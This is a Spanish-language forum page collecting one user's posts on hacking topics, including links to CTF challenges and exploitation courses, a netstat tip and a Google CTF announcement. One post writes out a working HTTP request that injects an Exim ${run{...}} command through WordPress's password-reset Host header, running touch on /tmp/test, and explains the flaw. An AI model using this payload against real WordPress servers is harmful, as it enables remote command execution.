Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - sirdarckcat

#1
@CommandPoison, cada exploit funciona de forma distinta.

DirtyCow es de los mas populares, pero hay varios y tendrias que decir cual tienes duda.
#2
yashira tiene varios, tienes que registrarte para poder entrar

http://www.yashira.org/index.php?mode=Retos&resp=inforeto&level=126
#3
hola giruzgz

si puedes hablar ingles, checate esto: https://github.com/RPISEC/MBE
#4
El resumen es que si envias esta peticion:
POST /wordpress/wp-login.php?action=lostpassword HTTP/1.1
Host: xenial(tmp1 -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}test}}  tmp2)
Content-Type: application/x-www-form-urlencoded
Content-Length: 56


user_login=admin&redirect_to=&wp-submit=Get+New+Password


Ejecutas /usr/bin/touch en /tmp/test, el bug es que el codigo de wordpress usa:
Código (php-brief) [Seleccionar]
$phpmailer->setFrom( $from_email, $from_name );

Y como es implementado, ese comando se convierte en:
Código (bash) [Seleccionar]
/usr/sbin/sendmail -t -i -fREMITENTE

Donde REMITENTE proviene del valor del valor de la cabecera Host, como nosotros controlamos la cabezera Host, solo debemos poner algo ahi y podemos controlar que escriba cualquier cosa.

La vulnerabilidad despues se convierte en ejecucion de codigo por medio de EXIM MTA http://www.exim.org/ , que es el servidor de correo instalado por default en Debian y Ubuntu.

Este tiene una opcion que se llama "Expansion Testing Mode", o modo de expansión de prueba, que puede ser usado para que EXIM lea y ejecute comandos en un lenguage propietario. Uno de los comandos es run.

Cuando haces:
${run{/bin/true}{yes}{no}}

Ejecuta /bin/true.. Facil

El motivo por el cual el exploit es mas complicado es porque la cabecera de Host no permite diagonales ni espacios, por lo que Dawid uso diagnoales y espacios en otras variables disponibles en el ambiente de EXIM.
#5
cual es el problema que tienes?
#7
Hacking / Re: Puertos
6 Junio 2017, 01:59 AM
si solo quieres saber los puertos abiertos de tu propia computadora, solo debes usar netstat.

netstat --listening --numeric

deberia ser lo unico que necesitas
#8
Hacking / Re: Ayuda usando Hydra
6 Junio 2017, 01:57 AM
que te dice cuando lo ejecutas?
#9
si, hay muchos indios muy buenos :)
#10
Hola

Alguien esta planeando participar en el juego de captura de bandera?

Es el  fin de semana del 17 de junio.


https://security.googleblog.com/2017/06/announcing-google-capture-flag-2017.html